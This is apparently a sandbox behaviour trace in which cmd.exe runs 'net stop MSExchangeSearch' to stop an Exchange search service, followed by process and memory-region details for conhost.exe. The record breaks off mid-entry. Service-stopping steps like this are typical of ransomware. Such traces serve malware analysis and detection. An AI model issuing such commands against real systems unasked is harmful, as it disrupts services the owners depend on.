[0139.848] GetCommandLineW () returned="/c net stop MSExchangeSearch" [0139.848] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0139.849] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5179cc0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0139.849] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0139.849] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0139.849] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.849] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0139.849] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0139.849] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0139.849] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0139.849] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0139.849] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0139.849] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0139.849] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0139.849] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0139.849] GetEnvironmentStringsW () returned 0x5177d68* [0139.849] FreeEnvironmentStringsA (penv="A") returned 1 [0139.849] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.849] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.849] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0139.849] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0139.849] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0139.849] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0139.849] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0139.849] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0139.849] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0139.849] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0139.849] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4defa74 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0139.849] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4defa74, lpFilePart=0x4defa6c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4defa6c*="Desktop") returned 0x1d [0139.850] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0139.850] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4def7f0 | out: lpFindFileData=0x4def7f0) returned 0x51705c8 [0139.850] FindClose (in: hFindFile=0x51705c8 | out: hFindFile=0x51705c8) returned 1 [0139.850] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4def7f0 | out: lpFindFileData=0x4def7f0) returned 0x51705c8 [0139.850] FindClose (in: hFindFile=0x51705c8 | out: hFindFile=0x51705c8) returned 1 [0139.850] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0139.850] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4def7f0 | out: lpFindFileData=0x4def7f0) returned 0x51705c8 [0139.850] FindClose (in: hFindFile=0x51705c8 | out: hFindFile=0x51705c8) returned 1 [0139.850] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0139.850] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0139.850] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0139.850] GetEnvironmentStringsW () returned 0x5177d68* [0139.850] FreeEnvironmentStringsA (penv="=") returned 1 [0139.850] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0139.851] GetConsoleOutputCP () returned 0x1b5 [0139.851] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0139.851] GetUserDefaultLCID () returned 0x409 [0139.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0139.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4defba4, cchData=128 | out: lpLCData="0") returned 2 [0139.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4defba4, cchData=128 | out: lpLCData="0") returned 2 [0139.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4defba4, cchData=128 | out: lpLCData="1") returned 2 [0139.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0139.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0139.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0139.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0139.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0139.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0139.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0139.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0139.851] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0139.851] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0139.851] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0139.852] GetConsoleTitleW (in: lpConsoleTitle=0x517a9e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.852] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0139.852] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0139.852] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0139.853] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0139.853] _wcsicmp (_String1="net", _String2=")") returned 69 [0139.853] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0139.853] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0139.853] _wcsicmp (_String1="IF", _String2="net") returned -5 [0139.853] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0139.853] _wcsicmp (_String1="REM", _String2="net") returned 4 [0139.853] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0139.854] GetConsoleTitleW (in: lpConsoleTitle=0x4def890, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.854] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0139.854] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0139.854] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0139.854] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0139.854] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0139.854] _wcsicmp (_String1="net", _String2="CD") returned 11 [0139.854] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0139.854] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0139.854] _wcsicmp (_String1="net", _String2="REN") returned -4 [0139.854] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0139.854] _wcsicmp (_String1="net", _String2="SET") returned -5 [0139.854] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0139.854] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0139.854] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0139.854] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0139.854] _wcsicmp (_String1="net", _String2="MD") returned 1 [0139.854] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0139.854] _wcsicmp (_String1="net", _String2="RD") returned -4 [0139.854] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0139.854] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0139.854] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0139.854] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0139.854] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0139.854] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0139.854] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0139.854] _wcsicmp (_String1="net", _String2="VER") returned -8 [0139.854] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0139.854] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0139.854] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0139.854] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0139.854] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0139.854] _wcsicmp (_String1="net", _String2="START") returned -5 [0139.854] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0139.855] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0139.855] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0139.855] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0139.855] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0139.855] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0139.855] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0139.855] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0139.855] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0139.855] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0139.855] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0139.855] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0139.855] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0139.855] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0139.855] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0139.855] _wcsicmp (_String1="net", _String2="CD") returned 11 [0139.855] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0139.855] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0139.855] _wcsicmp (_String1="net", _String2="REN") returned -4 [0139.855] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0139.855] _wcsicmp (_String1="net", _String2="SET") returned -5 [0139.855] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0139.855] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0139.855] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0139.855] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0139.855] _wcsicmp (_String1="net", _String2="MD") returned 1 [0139.855] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0139.855] _wcsicmp (_String1="net", _String2="RD") returned -4 [0139.855] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0139.855] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0139.855] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0139.855] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0139.855] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0139.855] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0139.855] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0139.855] _wcsicmp (_String1="net", _String2="VER") returned -8 [0139.855] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0139.855] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0139.855] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0139.855] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0139.855] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0139.855] _wcsicmp (_String1="net", _String2="START") returned -5 [0139.855] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0139.855] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0139.855] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0139.855] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0139.855] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0139.855] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0139.855] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0139.855] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0139.855] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0139.855] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0139.855] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0139.855] _wcsicmp (_String1="net", _String2="IF") returned 5 [0139.855] _wcsicmp (_String1="net", _String2="REM") returned -4 [0139.856] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0139.856] SetErrorMode (uMode=0x0) returned 0x0 [0139.856] SetErrorMode (uMode=0x1) returned 0x0 [0139.856] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x51705d0, lpFilePart=0x4def39c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4def39c*="Desktop") returned 0x1d [0139.856] SetErrorMode (uMode=0x0) returned 0x1 [0139.856] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0139.856] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0139.863] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0139.863] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0139.863] GetConsoleTitleW (in: lpConsoleTitle=0x4def61c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.864] InitializeProcThreadAttributeList (in: lpAttributeList=0x4def548, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4def52c | out: lpAttributeList=0x4def548, lpSize=0x4def52c) returned 1 [0139.864] UpdateProcThreadAttribute (in: lpAttributeList=0x4def548, dwFlags=0x0, Attribute=0x60001, lpValue=0x4def534, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4def548, lpPreviousValue=0x0) returned 1 [0139.864] GetStartupInfoW (in: lpStartupInfo=0x4def580 | out: lpStartupInfo=0x4def580*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0139.864] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0139.864] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0139.865] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeSearch", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4def4d0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeSearch", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4def51c | out: lpCommandLine="net stop MSExchangeSearch", lpProcessInformation=0x4def51c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xd0c, dwThreadId=0xe24)) returned 1 [0139.871] CloseHandle (hObject=0xa4) returned 1 [0139.871] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0139.871] GetEnvironmentStringsW () returned 0x5179ed0* [0139.872] FreeEnvironmentStringsA (penv="=") returned 1 [0139.872] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0139.990] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4def4b4 | out: lpExitCode=0x4def4b4*=0x2) returned 1 [0139.990] CloseHandle (hObject=0xa8) returned 1 [0139.990] _vsnwprintf (in: _Buffer=0x4def59c, _BufferCount=0x13, _Format="%08X", _ArgList=0x4def4bc | out: _Buffer="00000002") returned 8 [0139.990] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0139.990] GetEnvironmentStringsW () returned 0x517b3c0* [0139.990] FreeEnvironmentStringsA (penv="=") returned 1 [0139.990] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0139.990] GetEnvironmentStringsW () returned 0x517b3c0* [0139.990] FreeEnvironmentStringsA (penv="=") returned 1 [0139.990] DeleteProcThreadAttributeList (in: lpAttributeList=0x4def548 | out: lpAttributeList=0x4def548) [0139.990] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.990] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0139.991] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.991] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0139.991] _get_osfhandle (_FileHandle=0) returned 0x38 [0139.991] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0139.991] SetConsoleInputExeNameW () returned 0x1 [0139.991] GetConsoleOutputCP () returned 0x1b5 [0139.991] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0139.991] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.991] exit (_Code=2) Thread: id = 726 os_tid = 0xe38 Process: id = "246" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x15191000" os_pid = "0xc90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "245" os_parent_pid = "0x42c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11830 start_va = 0x7fc94000 end_va = 0x7fc94fff entry_point = 0x0 region_type = private name = "private_0x000000007fc94000" filename = "" Region: id = 11831 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11832 start_va = 0xf5eafa0000 end_va = 0xf5eafbffff entry_point = 0x0 region_type = private name = "private_0x000000f5eafa0000" filename = "" Region: id = 11833 start_va = 0xf5eafc0000 end_va = 0xf5eafd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f5eafc0000" filename = "" Region: id = 11834 start_va = 0xf5eafe0000 end_va = 0xf5eb01ffff entry_point = 0x0 region_type = private name = "private_0x000000f5eafe0000" filename = "" Region: id = 11835 start_va = 0x7df5ff6b0000 end_va = 0x7ff5ff6affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff6b0000" filename = "" Region: id = 11836 start_va = 0x7ff6c3fe0000 end_va = 0x7ff6c4002fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3fe0000" filename = "" Region: id = 11837 start_va = 0x7ff6c4007000 end_va = 0x7ff6c4007fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4007000" filename = "" Region: id = 11838 start_va = 0x7ff6c400e000 end_va = 0x7ff6c400ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c400e000" filename = "" Region: id = 11839 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 11840 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11841 start_va = 0xf5eafa0000 end_va = 0xf5eafaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f5eafa0000" filename = "" Region: id = 11842 start_va = 0xf5eafb0000 end_va = 0xf5eafb6fff entry_point = 0x0 region_type = private name = "private_0x000000f5eafb0000" filename = "" Region: id = 11843 start_va = 0xf5eb020000 end_va = 0xf5eb0ddfff entry_point = 0xf5eb020000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11844 start_va = 0xf5eb0e0000 end_va = 0xf5eb11ffff entry_point = 0x0 region_type = private name = "private_0x000000f5eb0e0000" filename = "" Region: id = 11845 start_va = 0xf5eb120000 end_va = 0xf5eb120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f5eb120000" filename = "" Region: id = 11846 start_va = 0xf5eb130000 end_va = 0xf5eb136fff entry_point = 0x0 region_type = private name = "private_0x000000f5eb130000" filename = "" Region: id = 11847 start_va = 0xf5eb140000 end_va = 0xf5eb140fff entry_point = 0x0 region_type = private name = "private_0x000000f5eb140000" filename = "" Region: id = 11848 start_va = 0xf5eb150000 end_va = 0xf5eb150fff entry_point = 0x0 region_type = private name = "private_0x000000f5eb150000" filename = "" Region: id = 11849 start_va = 0xf5eb170000 end_va = 0xf5eb17ffff entry_point = 0x0 region_type = private name = "private_0x000000f5eb170000" filename = "" Region: id = 11850 start_va = 0xf5eb210000 end_va = 0xf5eb30ffff entry_point = 0x0 region_type = private name = "private_0x000000f5eb210000" filename = "" Region: id = 11851 start_va = 0xf5eb310000 end_va = 0xf5eb497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f5eb310000" filename = "" Region: id = 11852 start_va = 0xf5eb4a0000 end_va = 0xf5eb620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f5eb4a0000" filename = "" Region: id = 11853 start_va = 0xf5eb630000 end_va = 0xf5eca2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f5eb630000" filename = "" Region: id = 11854 start_va = 0x7ff6c3ee0000 end_va = 0x7ff6c3fdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3ee0000" filename = "" Region: id = 11855 start_va = 0x7ff6c400c000 end_va = 0x7ff6c400dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c400c000" filename = "" Region: id = 11856 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 11857 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 